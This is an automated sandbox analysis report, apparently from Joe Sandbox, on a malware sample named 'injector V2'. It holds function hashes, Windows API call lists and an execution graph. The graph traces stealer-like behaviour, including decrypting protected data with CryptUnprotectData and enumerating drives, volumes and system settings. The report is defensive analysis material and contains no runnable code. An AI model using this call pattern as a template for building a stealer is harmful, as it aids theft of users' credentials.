                                                                                    • Associated: 00000003.00000002.2088403836.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088441225.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088456416.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088473187.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088491312.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                    • String ID:
                                                                                    • API String ID: 2112829910-0
                                                                                    • Opcode ID: 3252c119b915bfdef13967bd621916a573d88c033a7e3424812e516a09f21133
                                                                                    • Instruction ID: c0fc32153d04e952500d94daaf9fd14b469e837201900f022c88e547fcf47ad4
                                                                                    • Opcode Fuzzy Hash: 3252c119b915bfdef13967bd621916a573d88c033a7e3424812e516a09f21133
                                                                                    • Instruction Fuzzy Hash: 2ED188B5D002489FCF15DFA9C8E09AEBBB5FF09314F28416BE456EB352D634A902CB54
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2088419718.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2088403836.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088441225.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088456416.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088473187.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088491312.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: AdjustPointer
                                                                                    • String ID:
                                                                                    • API String ID: 1740715915-0
                                                                                    • Opcode ID: afff52e92908aa83ac61656d06cdb744da1566bf093f8565a7cb8080476faebe
                                                                                    • Instruction ID: f2182e0fdb1ea66df77aa6764f5fef37c4c0dcb4affb400f0c057a754e6f3e69
                                                                                    • Opcode Fuzzy Hash: afff52e92908aa83ac61656d06cdb744da1566bf093f8565a7cb8080476faebe
                                                                                    • Instruction Fuzzy Hash: E6510372605602AFEB2A9F15E861BBA73A5FF04304F14052FE9458B391EB39EC41C798
                                                                                    APIs
                                                                                      • Part of subcall function 004DD131: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,000000FF,?,?,00000000,?,?,004D87B1,?,00000000,?), ref: 004DD192
                                                                                    • GetLastError.KERNEL32(?,?,?,00000000,00000000,?,004DC95E,?,?,?,00000000), ref: 004DC61C
                                                                                    • __dosmaperr.LIBCMT ref: 004DC623
                                                                                    • GetLastError.KERNEL32(00000000,004DC95E,?,?,00000000,?,?,?,00000000,00000000,?,004DC95E,?,?,?,00000000), ref: 004DC65D
                                                                                    • __dosmaperr.LIBCMT ref: 004DC664
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2088419718.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2088403836.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088441225.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088456416.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088473187.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088491312.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                    • String ID:
                                                                                    • API String ID: 1913693674-0
                                                                                    • Opcode ID: 44b51c171248b5f8e2668ca08f33837478ab3dabbc39c1c9d15f85e785b3bb7a
                                                                                    • Instruction ID: 10723746cc27902094d629199e538dfa06f925b243e56a479bffae48e3b31f01
                                                                                    • Opcode Fuzzy Hash: 44b51c171248b5f8e2668ca08f33837478ab3dabbc39c1c9d15f85e785b3bb7a
                                                                                    • Instruction Fuzzy Hash: 3321B371604217AF9B10AF6688E092BB7A9EF45368710852BF81597791D738EC01CB98
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2088419718.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2088403836.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088441225.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088456416.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088473187.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088491312.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cd0004b404c8ad8e4941ce34312019c7b1348422597ea5d6da58f7992dd81f27
                                                                                    • Instruction ID: b9c7a278b8b291ceb0341fb9292a9a005e5bd470fe7d4d9f8698a9b6c4ce63d0
                                                                                    • Opcode Fuzzy Hash: cd0004b404c8ad8e4941ce34312019c7b1348422597ea5d6da58f7992dd81f27
                                                                                    • Instruction Fuzzy Hash: C221C271204206AFCB20AF66ECE1D2B77A9EF443A8710452BFA1997351DB38EC40D798
                                                                                    APIs
                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 004DD235
                                                                                      • Part of subcall function 004DD131: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,000000FF,?,?,00000000,?,?,004D87B1,?,00000000,?), ref: 004DD192
                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004DD26D
                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004DD28D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2088419718.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2088403836.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088441225.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088456416.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088473187.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088491312.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                    • String ID:
                                                                                    • API String ID: 158306478-0
                                                                                    • Opcode ID: 52b36ae3013d6f47bd0ae35ff6c0cf48465d04aa4621d775681cdd7001c4e7f4
                                                                                    • Instruction ID: 61b041babefe601e144f0ea0e09e43e95c31edff789ccade7210638004d5d1cc
                                                                                    • Opcode Fuzzy Hash: 52b36ae3013d6f47bd0ae35ff6c0cf48465d04aa4621d775681cdd7001c4e7f4
                                                                                    • Instruction Fuzzy Hash: C511D6B5D05519BE6B2227765CD9CBF6A6CDF853A8711006BF801D6342FB68CD0241BE
                                                                                    APIs
                                                                                    • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,004DFF31,00000000,00000001,00000000,?,?,004DE9DA,?,00000000,00000000), ref: 004E07D7
                                                                                    • GetLastError.KERNEL32(?,004DFF31,00000000,00000001,00000000,?,?,004DE9DA,?,00000000,00000000,?,?,?,004DE320,00000000), ref: 004E07E3
                                                                                      • Part of subcall function 004E0840: CloseHandle.KERNEL32(FFFFFFFE,004E07F3,?,004DFF31,00000000,00000001,00000000,?,?,004DE9DA,?,00000000,00000000,?,?), ref: 004E0850
                                                                                    • ___initconout.LIBCMT ref: 004E07F3
                                                                                      • Part of subcall function 004E0815: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,004E07B1,004DFF1E,?,?,004DE9DA,?,00000000,00000000,?), ref: 004E0828
                                                                                    • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,004DFF31,00000000,00000001,00000000,?,?,004DE9DA,?,00000000,00000000,?), ref: 004E0808
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2088419718.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2088403836.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088441225.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088456416.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088473187.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088491312.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                    • String ID:
                                                                                    • API String ID: 2744216297-0
                                                                                    • Opcode ID: b8427d747a4efb9374761fd23dc4c576d523842c2f535db1870ca4eeca483c51
                                                                                    • Instruction ID: 0a8e1e3b430a89d1aa140256ec1864ae54e7b0490f617585b21c6de9b4d153c8
                                                                                    • Opcode Fuzzy Hash: b8427d747a4efb9374761fd23dc4c576d523842c2f535db1870ca4eeca483c51
                                                                                    • Instruction Fuzzy Hash: 57F01236000199BBCF222FD6DC44D9A3F27FF04362F048522FA1889162C6728C60DBD8
                                                                                    APIs
                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 004D8D75
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2088419718.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2088403836.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088441225.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088456416.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088473187.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088491312.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___except_validate_context_record
                                                                                    • String ID: csm$csm
                                                                                    • API String ID: 3493665558-3733052814
                                                                                    • Opcode ID: fb2ed8a83059507ac120473e9f098b4cc484e03a170de68f0b1c3195545374a9
                                                                                    • Instruction ID: cc7bb379e472f72b95c0434cf05db5a65aea231faf320e1337c36e0f4711d214
                                                                                    • Opcode Fuzzy Hash: fb2ed8a83059507ac120473e9f098b4cc484e03a170de68f0b1c3195545374a9
                                                                                    • Instruction Fuzzy Hash: 6F31EF72400254EFCF229F51C8208BB7B26FB08318B084A5FF84489361CB3ADD61DF89
                                                                                    APIs
                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004D49EA
                                                                                    • ___raise_securityfailure.LIBCMT ref: 004D4AD2
                                                                                      • Part of subcall function 004D59FC: RaiseException.KERNEL32(E06D7363,00000001,00000003,004D49DE,BB40E64E,?,?,?,004D49DE,?,004E9B2C), ref: 004D5A5C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2088419718.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2088403836.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088441225.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088456416.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088473187.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088491312.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFeaturePresentProcessorRaise___raise_securityfailure
                                                                                    • String ID: %L
                                                                                    • API String ID: 3749517692-2702991972
                                                                                    • Opcode ID: dfd976d5bbf61b43069504c8e32ef71176d5b2750ceb556ea22d760f694b59f1
                                                                                    • Instruction ID: ce01194a8a78db14505d8324a97e97940c31d6b6563c53b841a6f997b12654a5
                                                                                    • Opcode Fuzzy Hash: dfd976d5bbf61b43069504c8e32ef71176d5b2750ceb556ea22d760f694b59f1
                                                                                    • Instruction Fuzzy Hash: 5F313AB5500394ABD700DF66ECE6A597BA8BB48314F10417BE918CE3E2E774A9468F4C
                                                                                    APIs
                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004D49EA
                                                                                    • ___raise_securityfailure.LIBCMT ref: 004D4AD2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2088419718.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2088403836.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088441225.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088456416.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088473187.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088491312.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                    • String ID: %L
                                                                                    • API String ID: 3761405300-2702991972
                                                                                    • Opcode ID: 9af2f3987a05bd664f4051f7ad3e9ab7c4b07df2a354a27ddbdb58caa0bf251c
                                                                                    • Instruction ID: c4f85501eb4e60f789ed6969f69ea3dae1a4398b7d4a2e82960b1b8e3cf0e559
                                                                                    • Opcode Fuzzy Hash: 9af2f3987a05bd664f4051f7ad3e9ab7c4b07df2a354a27ddbdb58caa0bf251c
                                                                                    • Instruction Fuzzy Hash: 7D21BFB55043A4EED710CF16E9D6A657BA4FB48314F1050BBE919CF3A2E3B4A8428F4C
                                                                                    APIs
                                                                                      • Part of subcall function 004D4533: __EH_prolog3_GS.LIBCMT ref: 004D453A
                                                                                    • std::domain_error::domain_error.LIBCPMT ref: 004D45EC
                                                                                      • Part of subcall function 004D43A4: std::exception::exception.LIBCONCRT ref: 004D43BA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2088419718.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2088403836.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088441225.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088456416.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088473187.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088491312.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog3_std::domain_error::domain_errorstd::exception::exception
                                                                                    • String ID: CDM$CDM
                                                                                    • API String ID: 2144476180-485079685
                                                                                    • Opcode ID: 508c82b7fadb6698e47a177a3a617d5462ecde6cf22c5f1827b8317e25e78dd2
                                                                                    • Instruction ID: 4bff465f5eb52eb7ce5761ed7c8a2ee6cc614f300affc1cc6247d18b11eb4bda
                                                                                    • Opcode Fuzzy Hash: 508c82b7fadb6698e47a177a3a617d5462ecde6cf22c5f1827b8317e25e78dd2
                                                                                    • Instruction Fuzzy Hash: 80014070D00208ABCF18EF6AD85589EBBF4EF88308750842FE41597341DB34D605CB94

                                                                                    Execution Graph

                                                                                    Execution Coverage:11.3%
                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                    Signature Coverage:40.5%
                                                                                    Total number of Nodes:331
                                                                                    Total number of Limit Nodes:29
                                                                                    execution_graph 12237 43e163 12238 43e180 12237->12238 12241 43d920 LdrInitializeThunk 12238->12241 12240 43e2ef 12241->12240 12242 42fc22 CoSetProxyBlanket 12243 408ae0 12244 408aef 12243->12244 12245 408d34 ExitProcess 12244->12245 12246 408af7 SHGetSpecialFolderPathW 12244->12246 12247 408b0d 12246->12247 12248 408b15 GetCurrentThreadId GetCurrentProcessId 12247->12248 12253 408d2a 12247->12253 12249 408b54 GetForegroundWindow 12248->12249 12250 408b4c 12248->12250 12251 408c7c 12249->12251 12250->12249 12251->12253 12254 40d260 CoInitializeEx 12251->12254 12253->12245 12255 40afe0 12257 40b020 12255->12257 12256 40b516 12257->12256 12257->12257 12258 43b070 RtlFreeHeap 12257->12258 12258->12256 12259 418be3 12260 418be8 12259->12260 12260->12260 12261 43ff30 LdrInitializeThunk 12260->12261 12262 418e0d 12261->12262 12270 418e9d 12262->12270 12272 418e56 12262->12272 12281 440280 12262->12281 12266 4196c7 12268 41df00 3 API calls 12266->12268 12267 419216 CryptUnprotectData 12269 419240 12267->12269 12267->12270 12267->12272 12268->12270 12269->12266 12269->12270 12273 419505 12269->12273 12286 41df00 12269->12286 12270->12270 12272->12267 12272->12269 12272->12270 12275 440350 12272->12275 12285 43d920 LdrInitializeThunk 12272->12285 12273->12266 12273->12270 12273->12273 12274 4400e0 LdrInitializeThunk 12273->12274 12274->12273 12276 440380 12275->12276 12279 4403ce 12276->12279 12298 43d920 LdrInitializeThunk 12276->12298 12277 44046e 12277->12272 12279->12277 12299 43d920 LdrInitializeThunk 12279->12299 12283 4402b0 12281->12283 12282 4402fe 12282->12272 12283->12282 12300 43d920 LdrInitializeThunk 12283->12300 12285->12272 12287 41df50 12286->12287 12287->12287 12301 418490 12287->12301 12289 41e034 12290 418490 3 API calls 12289->12290 12291 41e0dc 12290->12291 12292 418490 3 API calls 12291->12292 12293 41e196 12292->12293 12294 418490 3 API calls 12293->12294 12295 41e24b 12294->12295 12296 418490 3 API calls 12295->12296 12297 41e2c8 12296->12297 12297->12273 12298->12279 12299->12277 12300->12282 12302 4184a0 12301->12302 12303 43ff30 LdrInitializeThunk 12302->12303 12305 41856e 12303->12305 12304 418640 12307 41869c 12304->12307 12310 440280 LdrInitializeThunk 12304->12310 12312 4186cb 12304->12312 12315 41864c 12304->12315 12305->12304 12306 418633 12305->12306 12305->12307 12305->12312 12305->12315 12316 439040 12305->12316 12306->12304 12306->12307 12309 43ff30 LdrInitializeThunk 12306->12309 12306->12312 12306->12315 12311 440350 LdrInitializeThunk 12307->12311 12307->12312 12307->12315 12309->12304 12310->12307 12311->12312 12312->12315 12333 43d920 LdrInitializeThunk 12312->12333 12314 41896d 12315->12289 12315->12315 12317 43ff30 LdrInitializeThunk 12316->12317 12318 43906b 12317->12318 12319 439132 12318->12319 12321 43b030 RtlAllocateHeap 12318->12321 12324 439090 12318->12324 12325 4391be 12318->12325 12328 4391cb 12318->12328 12330 43907a 12318->12330 12322 43b070 RtlFreeHeap 12319->12322 12321->12325 12331 439138 12322->12331 12323 43b030 RtlAllocateHeap 12323->12328 12324->12319 12324->12330 12334 43b630 12324->12334 12338 43b450 12324->12338 12342 43b700 12324->12342 12325->12323 12328->12324 12351 43d920 LdrInitializeThunk 12328->12351 12330->12306 12331->12330 12350 43d920 LdrInitializeThunk 12331->12350 12333->12314 12335 43b63a 12334->12335 12336 43b6ce 12334->12336 12335->12336 12352 43d920 LdrInitializeThunk 12335->12352 12336->12324 12339 43b552 12338->12339 12340 43b462 12338->12340 12339->12324 12340->12339 12353 43d920 LdrInitializeThunk 12340->12353 12343 43b7c3 12342->12343 12345 43b716 12342->12345 12343->12324 12344 43b91e 12344->12343 12346 43b630 LdrInitializeThunk 12344->12346 12345->12343 12348 43b7be 12345->12348 12354 43d920 LdrInitializeThunk 12345->12354 12346->12343 12348->12344 12355 43d920 LdrInitializeThunk 12348->12355 12350->12330 12351->12324 12352->12336 12353->12339 12354->12348 12355->12344 11965 43b100 11966 43b130 11965->11966 11968 43b19e 11966->11968 11975 43d920 LdrInitializeThunk 11966->11975 11967 43b420 11968->11967 11976 43b030 11968->11976 11972 43b248 11974 43b2ee 11972->11974 11979 43d920 LdrInitializeThunk 11972->11979 11980 43b070 11974->11980 11975->11968 11977 43b040 11976->11977 11977->11977 11978 43b054 RtlAllocateHeap 11977->11978 11978->11972 11979->11974 11981 43b0f6 11980->11981 11982 43b088 RtlFreeHeap 11980->11982 11981->11967 11982->11981 12356 433d60 12357 433d65 12356->12357 12358 433d9b GetSystemMetrics GetSystemMetrics 12357->12358 12359 433dda 12358->12359 12360 438660 12361 438685 12360->12361 12365 43874a 12361->12365 12369 43d920 LdrInitializeThunk 12361->12369 12362 438967 12365->12362 12366 438846 12365->12366 12368 43d920 LdrInitializeThunk 12365->12368 12366->12362 12370 43d920 LdrInitializeThunk 12366->12370 12368->12365 12369->12361 12370->12366 12371 43db27 12372 43db50 12371->12372 12374 43dbae 12372->12374 12378 43d920 LdrInitializeThunk 12372->12378 12375 43dc5e 12374->12375 12377 43d920 LdrInitializeThunk 12374->12377 12377->12375 12378->12374 11984 40e085 11985 40e0a0 11984->11985 11988 40e0ee 11985->11988 12060 43d920 LdrInitializeThunk 11985->12060 11987 40e17e 12004 424470 11987->12004 11988->11987 12061 43d920 LdrInitializeThunk 11988->12061 11991 40e1c9 12017 424db0 11991->12017 11993 40e1e9 12023 425080 11993->12023 11995 40e209 12031 426910 11995->12031 12005 4244d0 12004->12005 12005->12005 12006 424654 12005->12006 12007 4247a1 12005->12007 12073 4400e0 12005->12073 12006->11991 12007->12006 12007->12007 12010 424905 12007->12010 12013 424a87 12007->12013 12077 4228a0 12007->12077 12011 424a71 GetLogicalDrives 12010->12011 12012 4400e0 LdrInitializeThunk 12011->12012 12012->12013 12014 424bc1 GetLogicalDrives 12013->12014 12015 4400e0 LdrInitializeThunk 12014->12015 12016 424bd7 12015->12016 12021 424e60 12017->12021 12018 424fa0 12101 420970 12018->12101 12019 424f50 12019->11993 12021->12018 12021->12019 12107 4409f0 12021->12107 12024 425090 12023->12024 12119 440620 12024->12119 12026 425206 12027 4409f0 3 API calls 12026->12027 12028 424f60 12026->12028 12029 424fa0 12026->12029 12027->12026 12028->11995 12029->12029 12030 420970 3 API calls 12029->12030 12030->12028 12032 40e229 12031->12032 12038 426946 12031->12038 12040 427140 12032->12040 12033 440620 LdrInitializeThunk 12033->12038 12034 4409f0 3 API calls 12034->12038 12038->12032 12038->12033 12038->12034 12039 43d920 LdrInitializeThunk 12038->12039 12124 43d880 12038->12124 12133 440740 12038->12133 12143 440fb0 12038->12143 12039->12038 12041 427160 12040->12041 12043 42719e 12041->12043 12157 43d920 LdrInitializeThunk 12041->12157 12042 40e232 12050 427580 12042->12050 12043->12042 12044 43b030 RtlAllocateHeap 12043->12044 12047 427208 12044->12047 12046 43b070 RtlFreeHeap 12046->12042 12049 42725e 12047->12049 12158 43d920 LdrInitializeThunk 12047->12158 12049->12046 12159 4275a0 12050->12159 12060->11988 12061->11987 12074 440100 12073->12074 12075 44022e 12074->12075 12092 43d920 LdrInitializeThunk 12074->12092 12075->12007 12093 43ff30 12077->12093 12079 423133 12079->12010 12080 4228e0 12080->12079 12081 43b030 RtlAllocateHeap 12080->12081 12084 422939 12081->12084 12083 42307d 12085 43b070 RtlFreeHeap 12083->12085 12089 4229e1 12084->12089 12097 43d920 LdrInitializeThunk 12084->12097 12087 42308d 12085->12087 12086 43b030 RtlAllocateHeap 12086->12089 12087->12079 12099 43d920 LdrInitializeThunk 12087->12099 12089->12083 12089->12086 12091 43b070 RtlFreeHeap 12089->12091 12098 43d920 LdrInitializeThunk 12089->12098 12091->12089 12092->12075 12095 43ff50 12093->12095 12094 44008e 12094->12080 12095->12094 12100 43d920 LdrInitializeThunk 12095->12100 12097->12084 12098->12089 12099->12087 12100->12094 12106 420980 12101->12106 12102 420a97 12102->12019 12103 4400e0 LdrInitializeThunk 12104 420aba 12103->12104 12104->12102 12105 4228a0 3 API calls 12104->12105 12105->12102 12106->12102 12106->12103 12106->12104 12110 440a20 12107->12110 12108 440a6e 12109 440cb4 12108->12109 12111 43b030 RtlAllocateHeap 12108->12111 12109->12021 12110->12108 12117 43d920 LdrInitializeThunk 12110->12117 12114 440aaf 12111->12114 12113 43b070 RtlFreeHeap 12113->12109 12116 440b1e 12114->12116 12118 43d920 LdrInitializeThunk 12114->12118 12116->12113 12116->12116 12117->12108 12118->12116 12121 440640 12119->12121 12120 44070f 12120->12026 12121->12120 12123 43d920 LdrInitializeThunk 12121->12123 12123->12120 12125 43d901 12124->12125 12126 43d8f6 12124->12126 12127 43d8aa RtlReAllocateHeap 12124->12127 12128 43d89c 12124->12128 12129 43b070 RtlFreeHeap 12125->12129 12130 43b030 RtlAllocateHeap 12126->12130 12132 43d8fc 12127->12132 12128->12125 12128->12127 12129->12132 12130->12132 12132->12038 12134 440760 12133->12134 12135 4407ae 12134->12135 12153 43d920 LdrInitializeThunk 12134->12153 12136 4409cd 12135->12136 12138 43b030 RtlAllocateHeap 12135->12138 12136->12038 12140 44082f 12138->12140 12139 43b070 RtlFreeHeap 12139->12136 12142 44089f 12140->12142 12154 43d920 LdrInitializeThunk 12140->12154 12142->12139 12144 440fbf 12143->12144 12146 44107e 12144->12146 12155 43d920 LdrInitializeThunk 12144->12155 12145 441275 12145->12038 12146->12145 12147 43b030 RtlAllocateHeap 12146->12147 12149 441124 12147->12149 12151 4411be 12149->12151 12156 43d920 LdrInitializeThunk 12149->12156 12150 43b070 RtlFreeHeap 12150->12145 12151->12150 12153->12135 12154->12142 12155->12146 12156->12151 12157->12043 12158->12049 12160 427610 12159->12160 12160->12160 12163 43b100 12160->12163 12164 43b130 12163->12164 12166 43b19e 12164->12166 12173 43d920 LdrInitializeThunk 12164->12173 12165 427683 12166->12165 12168 43b030 RtlAllocateHeap 12166->12168 12170 43b248 12168->12170 12169 43b070 RtlFreeHeap 12169->12165 12172 43b2ee 12170->12172 12174 43d920 LdrInitializeThunk 12170->12174 12172->12169 12173->12166 12174->12172 12176 43e244 12177 43e260 12176->12177 12179 43e2be 12177->12179 12183 43d920 LdrInitializeThunk 12177->12183 12182 43d920 LdrInitializeThunk 12179->12182 12181 43e3cb 12182->12181 12183->12179 12379 43752b 12380 437543 12379->12380 12381 437557 GetUserDefaultUILanguage 12380->12381 12382 437589 12381->12382 12184 40dfd0 12185 40dff0 12184->12185 12185->12185 12186 40e033 12185->12186 12188 43d920 LdrInitializeThunk 12185->12188 12188->12186 12189 43e6d2 12190 43e6e8 GetForegroundWindow 12189->12190 12191 43e6f6 12190->12191 12192 43de11 12193 43de40 12192->12193 12194 43de9e 12193->12194 12198 43d920 LdrInitializeThunk 12193->12198 12197 43d920 LdrInitializeThunk 12194->12197 12197->12194 12198->12194 12383 422470 12384 42247e 12383->12384 12388 4224c0 12383->12388 12389 422580 12384->12389 12386 42253c 12387 420bb0 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 12386->12387 12386->12388 12387->12388 12390 422590 12389->12390 12390->12390 12391 4400e0 LdrInitializeThunk 12390->12391 12392 4226af 12391->12392 12199 4389d0 12201 438a40 CoCreateInstance 12199->12201 12202 438f56 12201->12202 12203 438b1a SysAllocString 12201->12203 12204 438f66 GetVolumeInformationW 12202->12204 12207 438bc7 12203->12207 12206 438f7d 12204->12206 12208 438f45 SysFreeString 12207->12208 12209 438bcf CoSetProxyBlanket 12207->12209 12208->12202 12210 438f3b 